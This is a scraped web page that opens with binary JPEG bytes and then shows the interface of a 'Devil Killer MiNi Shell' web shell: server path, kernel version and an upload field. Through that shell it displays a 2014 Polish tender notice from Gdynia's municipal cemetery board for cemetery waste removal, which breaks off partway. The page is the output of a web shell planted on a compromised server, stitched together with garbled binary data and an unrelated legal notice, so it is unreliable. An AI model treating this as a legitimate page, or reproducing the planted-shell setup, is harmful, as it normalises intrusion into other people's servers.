JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141015/341568-N-2014.html

<p class="kh_header"><b>Gdynia: WYWÓZ ODPADÓW Z TERENU CMENTARZY KOMUNALNYCH ADMINISTROWANYCH PRZEZ ZARZĄD CMENTARZY KOMUNALNYCH W GDYNI</b><br>
<b>Numer ogłoszenia: 341568 - 2014; data zamieszczenia: 15.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Cmentarzy Komunalnych w Gdyni , ul. Witomińska 76, 81-311 Gdynia, woj. pomorskie, tel. 0-58 660-89-50, faks 0-58 660-89-69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ ODPADÓW Z TERENU CMENTARZY KOMUNALNYCH ADMINISTROWANYCH PRZEZ ZARZĄD CMENTARZY KOMUNALNYCH W GDYNI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiot zamówienia obejmuje wywóz odpadów z terenu cmentarzy komunalnych administrowanych przez Zarząd Cmentarzy Komunalnych w Gdyni i składa się z 3 (trzech) części:

1.Część pierwsza obejmuje wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Witomińskiej

1.1. Rodzaj i kod odpadów: 
-	pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-	gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

1.2. Wielkość i rodzaj kontenerów: 

Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-7 (7m3) , KP-8 (8 m3) i KP-9 m3, otwarte, odbiór hakowy.

1.3. Dodatkowe kontenery:

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsca wskazane przez Zamawiającego 2 kontenerów o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 5 dodatkowych kontenerów o pojemności 7 m3, 8 m3 lub 9 m3, 

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2015 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 7 m3, 8 m3 lub 9 m3.


2. Część druga obejmuje wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Spokojnej

2.1. Rodzaj i kod odpadów: 
-	pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-	ziemia i kamienie z wykopów pod groby (kod odpadu: 17 05 04 - gleba i ziemia, w tym kamienie inne niż wymienione w 17 05 03),
-	gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

2.2. Wielkość i rodzaj kontenerów 

Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-8 (8 m3), otwarte, odbiór hakowy.

2.3. Dodatkowe kontenery:

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsce wskazane przez Zamawiającego 1 kontenera o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01) albo ziemi i kamieni z wykopów pod groby inne niż wymienione w 17 05 03 (kod odpadu: 17 05 04),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 8 m3,

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2015 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 2 dodatkowych kontenerów o pojemności 8 m3.

3. Część trzecia obejmuje wywóz odpadów Z terenu cmentarza komunalnego położonego w Kosakowie przy ulicy Rzemieślniczej

3.1. Rodzaj i kod odpadów: 
-	pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-	ziemia i kamienie z wykopów pod groby (kod odpadu: 17 05 04 - gleba i ziemia, w tym kamienie inne niż wymienione w 17 05 03),
-	gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

3.2. Wielkość i rodzaj kontenerów 

Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP-7 (7 m3) i KP-8 (8 m3), otwarte, odbiór hakowy.

3.3. Dodatkowe kontenery:

Wykonawca zobowiązany będzie na czas realizacji zamówienia do dostarczenia i ustawienia na terenie cmentarza w miejsce wskazane przez Zamawiającego 1 kontenera o pojemności 5 m3 z przeznaczeniem na gromadzenie i wywóz gruzu (kod odpadu 17 01 01) albo ziemi i kamieni z wykopów pod groby inne niż wymienione w 17 05 03 (kod odpadu: 17 05 04),

w dniach 15.10-03.11.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do  dostarczenia i ustawienia na terenie cmentarza w miejsca i w ilości wskazanej przez Zamawiającego do 3 dodatkowych kontenerów o pojemności 7 m3 lub 8 m3,

w dniach 01-05.01.2015 r., 19.03-08.04.2015 r., 21-27.05.2014 r., 11-31.12.2015 r. Wykonawca zobowiązany będzie na wniosek Zamawiającego do dostarczenia i ustawienia na terenie cmentarza w miejscu wskazanym przez Zamawiającego 1 dodatkowego kontenera o pojemności 7 m3 lub 8 m3.

4. Zasady realizacji usługi wywozu odpadów z terenu cmentarzy komunalnych administrowanych przez Zarząd Cmentarzy Komunalnych w Gdyni (wspólne dla wszystkich części):

4.1.  w ramach usługi Wykonawca zobowiązany będzie do wywozu napełnionych kontenerów z cmentarzy, utylizacji odpadów zgodnie z obowiązującymi przepisami i ponownego ich ustawienia na terenie cmentarza.
4.2.   usługi, z zastrzeżeniem o którym mowa w pkt. 4.4, świadczone będą każdorazowo na zlecenie Zamawiającego. Zlecenia składane będą drogą telefoniczną w godzinach 700-1500 od   poniedziałku do soboty. W przypadku braku możliwości złożenia zlecenia drogą telefoniczną (np. awaria linii, brak połączenia), zlecenia składane będą za pomocą poczty elektronicznej (e-mail) lub faksem. Wykonawca zobowiązany będzie do niezwłocznego potwierdzenia odebrania zlecenia drogą elektroniczną lub faksem.
4.3.  wykonanie usługi, z zastrzeżeniem o którym mowa w pkt. 4.4, winno się odbyć najpóźniej w ciągu następnego dnia roboczego (tj. od poniedziałku do soboty) po dniu zgłoszenia w godz. 700-1500.
4.4.  w dniach znacznego zwiększenia liczby osób odwiedzających cmentarze tj. 15.10-03.11.2015 r., Wykonawca zobowiązany będzie do:
4.4.1.bieżącego wywozu zapełnionych kontenerów, bez konieczności zachowania trybu określonego w pkt 4.2 i 4.3,
4.4.2.wskazania osoby, której zadaniem będzie bezpośredni nadzór nad realizacją usługi   w ścisłej współpracy z Zamawiającym do czasu zakończenia wywozu w powyższym okresie.
4.5. każdorazowy wywóz winien być odnotowany w rejestrze wywozów prowadzonym przez Zamawiającego i poświadczony przez Wykonawcę.
4.6.   Wykonawca winien zabezpieczyć tabor niezbędny do realizacji zamówienia.
4.7.  Wykonawca zobowiązany będzie przez cały okres obowiązywania umowy i wykonywania zamówienia do dysponowania stałą dostępną dla Zamawiającego łącznością telefoniczną (co najmniej 2 numery telefoniczne), faksem oraz pocztą elektroniczną do przyjmowania zleceń na usługi. Poczta elektroniczna musi być obsługiwana w programie pozwalającym na potwierdzenie odbioru otrzymanej wiadomości.

5. Prognozowana ilość wywozu kontenerów w okresie trwania zamówienia. Szacuje się, że w okresie wykonywania zamówienia Wykonawca dokona wywozu kontenerów w następujących ilościach:
7.1. dla części pierwszej zamówienia tj. z terenu cmentarza komunalnego przy ul. Witomińskiej w Gdyni:
-	kontener 7 m3 - 180 wywozów,
-	kontener 8 m3 - 250 wywozów,
-	kontener 9 m3 -  70 wywozów,
-	kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 100 wywozów.

5.2. dla części drugiej zamówienia tj. z terenu cmentarza komunalnego przy ul. Spokojnej w Gdyni:
-	kontener 8 m3 - 130 wywozów,
-	kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 15 wywozów,
-	kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu ziemi i kamieni) -  5 wywozów

5.3. dla części trzeciej zamówienia tj. z cmentarza komunalnego w Kosakowie przy ul. Rzemieślniczej:
-	kontener 7 m3 - 30 wywozów,
-	kontener 8 m3 - 140 wywozów,
-	kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu gruzu) - 5 wywozów,
-	kontener 5 m3 (z przeznaczeniem do gromadzenia i wywozu ziemi i kamieni) -  15 wywozów.


UWAGA! Podane powyżej ilości wywozów oszacowane zostały na podstawie danych z poprzednich okresów i mogą ulec zmianie w zależności od zapotrzebowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie przedmiotu zamówienia wymaga posiadania specjalnych uprawnień tj.:

1) uzyskanie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych, zgodnie z art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (jednolity tekst Dz. U. 2013.1399 z późn. zm.);
2) uzyskanie wpisu do rejestru działalności regulowanej w zakresie zezwolenia  na transport odpadów, prowadzonego przez Marszałka Województwa, o którym mowa w art. 49 ust. 1 w zw. z art. 233 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (tekst jednolity  Dz. U. 2013.21) 

UWAGA  Zezwolenia na transport odpadów wydane na podstawie przepisów dotychczasowych zachowują ważność na czas na jaki zostały wydane, nie dłużej jednak niż do czasu upływu terminu do złożenia wniosku o wpis do rejestru, o którym mowa powyżej lub z dniem uzyskania wpisu do tego rejestru, w przypadku gdy wpis nastąpił w terminie wcześniejszym.

Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana na podstawie dostarczonych wraz z ofertą dokumentów lub oświadczeń tj.: 

1)   oświadczenie, iż Wykonawca spełnia warunki określone w art.22 ust.1 ustawy z dnia 29 stycznia 2004 r.-Prawo zamówień publicznych,
2) potwierdzenie dokonania wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych: 
a)	w odniesieniu do części pierwszej zamówienia  -na terenie Gminy Miasta Gdyni, 
b)	 w odniesieniu do części drugiej zamówienia -na terenie Gminy Miasta Gdyni,      
c)	w odniesieniu do części trzeciej zamówienia -na terenie Gminy Kosakowa 
 - dokonanego zgodnie z art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (jednolity tekst Dz. U. 2013.1399 z późn. zm.) i obejmujące swym zakresem rodzaj opadów określonych w przedmiocie zamówienia.

UWAGA
Z dniem 23 lipca 2012 r. kompetencje w zakresie prowadzenia rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu miasta Gdynia oraz gminy Kosakowo przejął Komunalny Związek Gmin Dolina Redy i Chylonki z siedzibą w Gdyni przy ul. Konwaliowej 1, tel. 58 624-45-99 (www.kzg.pl)  

3) potwierdzenie dokonania wpisu do rejestru działalności regulowanej w zakresie prowadzenia działalności transportu odpadów, prowadzonego przez Marszałka województwa uprawniające do prowadzenia tej działalności na terenie:
a)	 w odniesieniu do części pierwszej zamówienia - na terenie Gminy Miasta Gdyni, 
b)	w odniesieniu do części drugiej zamówienia - na terenie Gminy Miasta Gdyni, 
c)	w odniesieniu do części trzeciej zamówienia - na terenie Gminy Kosakowa 

- dokonanego zgodnie z art. 49 ust. 1. w zw. z art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach.

UWAGA do czasu uzyskania wpisu w rejestrze, zezwolenia na transport odpadów, wydane na podstawie  dotychczasowych przepisów tj. art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach zachowują ważność na czas ich wydania, nie dłużej jednak niż do czasu upływu terminu  do złożenia wniosku o wpis do rejestru.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wo</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy z dnia 29 stycznia 2004 r.-Prawo zamówień publicznych, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu następujące dokumenty wskazujących zakres dostępnych Wykonawcy zasobów innego podmiotu:
1)	wskazujących sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
2)	wskazujących charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
3)	wskazujących zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 

Jeżeli Wykonawca wykazując spełnienie warunków udziału w realizacji zamówienia polega na  zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji zamówienia, Zamawiający żąda od Wykonawcy złożenia w odniesieniu do tych podmiotów odpowiednio dokumentów:
1)	oświadczenie o braku podstaw do wykluczenia zgodnie z art.24  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
2)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej (CEIDG), jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych   wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferta, w stosunku do osób fizycznych oświadczenie w zakresie art.24 ust. 1 pkt 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
3)	potwierdzenie dokonania wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych,
4)	potwierdzenie dokonania wpisu do rejestru działalności regulowanej w zakresie prowadzenia działalności transportu odpadów, prowadzonego przez Marszałka województwa uprawniające do prowadzenia tej działalności na terenie Gminy Mst. Gdyni i lub Gminy Kasako</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, że wprowadzenie zmian do umowy możliwe będzie w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w szczególności w następujących przypadkach:
1)	omyłek pisarskich lub błędów rachunkowych,
2)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
3)	konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych,
4)	konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
6)	zmiany stawek podatku
7)	innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Cmentarzy Komunalnych w Gdyni 81-311 Gdynia, ul. Witomińska 76, pok nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2014 godzina 13:00, miejsce: Zarząd Cmentarzy Komunalnych w Gdyni 81-311 Gdynia, ul. Witomińska 76, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Witomińskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wywóz odpadów z terenu cmentarza komunalnego położonego w Gdyni przy ulicy Witomińskiej

1.1. Rodzaj i kod odpadów: 
-	pozostałości po sprzątaniu grobów i ich otoczenia (kod odpadu: 20 02 - odpady z ogrodów i parków, w tym z cmentarzy),
-	gruz betonowy z rozbiórek i remontów nagrobków (kod odpadu 17 01 01 - odpady betonu oraz gruz betonowy z rozbiórek i remontów). 

1.2. Wielkość i rodzaj kontenerów: 

